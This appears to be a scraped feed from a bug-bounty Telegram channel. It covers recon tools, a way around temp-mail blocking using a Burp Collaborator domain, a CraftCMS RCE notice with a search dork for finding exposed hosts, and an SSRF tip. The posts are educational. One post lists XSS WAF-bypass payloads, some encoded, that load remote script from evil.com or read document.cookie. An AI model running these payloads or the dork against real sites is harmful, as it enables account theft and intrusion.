This media is not supported in your browser
VIEW IN TELEGRAM
Extract all URL endpoints from an application and dump them to the command-line with hakrawler!
How hakrawler works:
1οΈβ£ Spider the application
2οΈβ£ Query the wayback machine
3οΈβ£ Parses robots.txt and sitemap.xml files
How hakrawler works:
1οΈβ£ Spider the application
2οΈβ£ Query the wayback machine
3οΈβ£ Parses robots.txt and sitemap.xml files
π8β€4π₯2
Hunting for misconfigured AWS S3 cloud buckets:
1. Clone CloudEnum
2. Run $ python3 cloud_enum.py -k <TARGET_KEYWORD>
3. Examine results π
https://github.com/initstring/cloud_enum
1. Clone CloudEnum
2. Run $ python3 cloud_enum.py -k <TARGET_KEYWORD>
3. Examine results π
https://github.com/initstring/cloud_enum
π10
β‘ Simple Temp Mail Bypass Methodπ₯
Hello hunters! I'm DarkShadow, dropping a quick trick for when websites block temporary emails and only accept "legit" ones.
First, understand the security behind it:
When you sign up, the server doesnβt just trust your email. It checks if the domain is live via DNS before accepting and sending emails. Temp mail services use dead domains, so they fail this check.
Bypass Trick:
Use Burp Collaborator to create a "live" email!
Example:
Burp link: https://2twpagov8v5bsbmdwktmtkyygpmia9yy.oastify.com
Make it look like an email:
Since the domain is live (thanks to Burp), youβll bypass the email validation easily!
Pro Tip:
Use Burp Collaborator emails β theyβre not just for bypassing, they also help you spot SSRF vulnerabilities!
Follow me ππΌ DarkShadow π
#BugBountytips@brutsecurity
Hello hunters! I'm DarkShadow, dropping a quick trick for when websites block temporary emails and only accept "legit" ones.
First, understand the security behind it:
When you sign up, the server doesnβt just trust your email. It checks if the domain is live via DNS before accepting and sending emails. Temp mail services use dead domains, so they fail this check.
Bypass Trick:
Use Burp Collaborator to create a "live" email!
Example:
Burp link: https://2twpagov8v5bsbmdwktmtkyygpmia9yy.oastify.com
Make it look like an email:
admin123@2twpagov8v5bsbmdwktmtkyygpmia9yy.oastify.com
Since the domain is live (thanks to Burp), youβll bypass the email validation easily!
Pro Tip:
Use Burp Collaborator emails β theyβre not just for bypassing, they also help you spot SSRF vulnerabilities!
Follow me ππΌ DarkShadow π
#BugBountytips@brutsecurity
π₯17π6β€4π€£3
π¬ Enjoying the free content?
If you found it helpful or valuable, consider leaving a small tip or a reaction to support us! π«Άβ¨
Your support helps us continue creating and sharing more awesome resources for everyone. πβ€οΈ
Every contribution, big or small, truly makes a difference for the community. Thank you for being with us! π
If you found it helpful or valuable, consider leaving a small tip or a reaction to support us! π«Άβ¨
Your support helps us continue creating and sharing more awesome resources for everyone. πβ€οΈ
Every contribution, big or small, truly makes a difference for the community. Thank you for being with us! π
4π28β€21πΏ3π₯1π1π€1
Guy's how about my poemπ
DarkShadow's Vulnerable Heart
I hate XSS β it plays with my mind,
I master SQLi β injections I find.
My crush? XXE β stealing the show,
LFI's easy β just follow the flow.
I dream of RCE β ultimate power,
But a broken auth melts me like a flower.
Race conditions β they're chasing me fast,
IDOR unlocks the secrets of the past.
SSRF teases β from inside the gate,
And open redirects just seal my fate.
DarkShadow hunts β in shadows unseen,
Turning every weakness into my dream.
I donβt just hack β
I rewrite the scene.
Written by ~DarkShadow
β€25π«‘9π5πΏ5π€£3π€2π³1
DarkShadow truly remembers all of you:
Guys, some very interesting topics are coming soon about Advance XSS, leaking credentials to RCE, Google XSS POC, XXE to RCE, and more.Show your love, guys!
1. Learn less, practice more.
2. Tools are nothing without core knowledge.
3. Chasing basic bugs won't make you elite.
4. Pro hunters create new exploits, not copy old ones.
5. Think beyond checklists β think like an attacker.
Guys, some very interesting topics are coming soon about Advance XSS, leaking credentials to RCE, Google XSS POC, XXE to RCE, and more.
β€45π5π₯5π€2π«‘1
CVE-2025-32432: RCE in CraftCMS, 10.0 rating π₯π₯π₯
0-day vulnerability makes some versions of CraftCMS vulnerable to RCE. Used in the wild in combination with CVE-2024-58136.
Search at Netlas.io:
π Link: https://nt.ls/XVVPd
π Dork: http.headers.x_powered_by:"Craft CMS"
Vendor's advisory: https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3
0-day vulnerability makes some versions of CraftCMS vulnerable to RCE. Used in the wild in combination with CVE-2024-58136.
Search at Netlas.io:
π Link: https://nt.ls/XVVPd
π Dork: http.headers.x_powered_by:"Craft CMS"
Vendor's advisory: https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3
β€12π3π₯2
Please open Telegram to view this post
VIEW IN TELEGRAM
π10π₯5
Hello Hunters,
DarkShadow here, back again with a quick tip and a heads-up: you might encounter SSRF vulnerabilities in email-sending features!
Take a look at these screenshots β the website actively validates emails to block temporary email addresses. However, when I used Burp Collaborator as the email input, I received DNS, SMTP, and even HTTP responses!
This demonstrates that during pentesting, instead of relying on temporary mail services, you should always use Burp Collaborator to uncover hidden vulnerabilities.
Stay sharp and hunt smarter!
Follow meππΌ DarkShadow
#bugbountytips@brutsecurity #ssrf
DarkShadow here, back again with a quick tip and a heads-up: you might encounter SSRF vulnerabilities in email-sending features!
Take a look at these screenshots β the website actively validates emails to block temporary email addresses. However, when I used Burp Collaborator as the email input, I received DNS, SMTP, and even HTTP responses!
This demonstrates that during pentesting, instead of relying on temporary mail services, you should always use Burp Collaborator to uncover hidden vulnerabilities.
Stay sharp and hunt smarter!
Follow meππΌ DarkShadow
#bugbountytips@brutsecurity #ssrf
πΏ12π10β€9π₯7
Please open Telegram to view this post
VIEW IN TELEGRAM
π€16π9π₯6
Hey Hunters,
DarkShadow hereβdropping a quick tip for your next XSS hunt!
Tired of firewalls blocking alert(), prompt(), or confirm()? Use
Try these sneaky XSS payloads:
Blind Payloads:
Encoded Variants:
Evil Payload.js Example:
Hope these payloads help you understand how to bypass firewalls that block your payloads, even when an XSS vulnerability still exists. However, their effectiveness depends on the specific web application and firewall configurations you're testing against.
Want a full XSS WAF Bypass Cheat Sheet? Let me know in the commentsβI'll cook one up!
Follow me ππΌ DarkShadow
#bugbountytips #xss #wafbypass
DarkShadow hereβdropping a quick tip for your next XSS hunt!
Tired of firewalls blocking alert(), prompt(), or confirm()? Use
import() to level up your payload game.Try these sneaky XSS payloads:
import('data:text/javascript;base64,YWxlcnQoJ1hTUyEnKQ==')
// Base64 β alert('XSS!')
import('data:text/javascript,%61lert(document.cookie)')
// %61 = 'a'
Blind Payloads:
<script type="module">import('https://evil.com/payload.js');</script>
<img src=x onerror="import('https://evil.com/payload.js')">
<svg/onload="import('https://evil.com/payload.js')">
(()=>{import('https://evil.com/payload.js')})()
import(/*trick*/'https://evil.com/payload.js')
Encoded Variants:
\u0069\u006d\u0070\u006f\u0072\u0074('https://evil.com/payload.js')
// import as Unicode encoding
<script>import(String.fromCharCode( 104,116,116,112,115,58,47,47,101,118,105,108,46,99,111,109,47,112,97,121,46,106,115));</script>
// https://evil.com/pay.js ASCII decimal encoding
Evil Payload.js Example:
export function pwn() {
alert('DarkShadow is here!');
}
Hope these payloads help you understand how to bypass firewalls that block your payloads, even when an XSS vulnerability still exists. However, their effectiveness depends on the specific web application and firewall configurations you're testing against.
Want a full XSS WAF Bypass Cheat Sheet? Let me know in the commentsβI'll cook one up!
Follow me ππΌ DarkShadow
#bugbountytips #xss #wafbypass
π₯22π8β€5π€1
Certified Red Team Professional (CRTP) - Notes
ππ₯
πhttps://dev-angelist.gitbook.io/crtp-notes
ππ₯
πhttps://dev-angelist.gitbook.io/crtp-notes
π19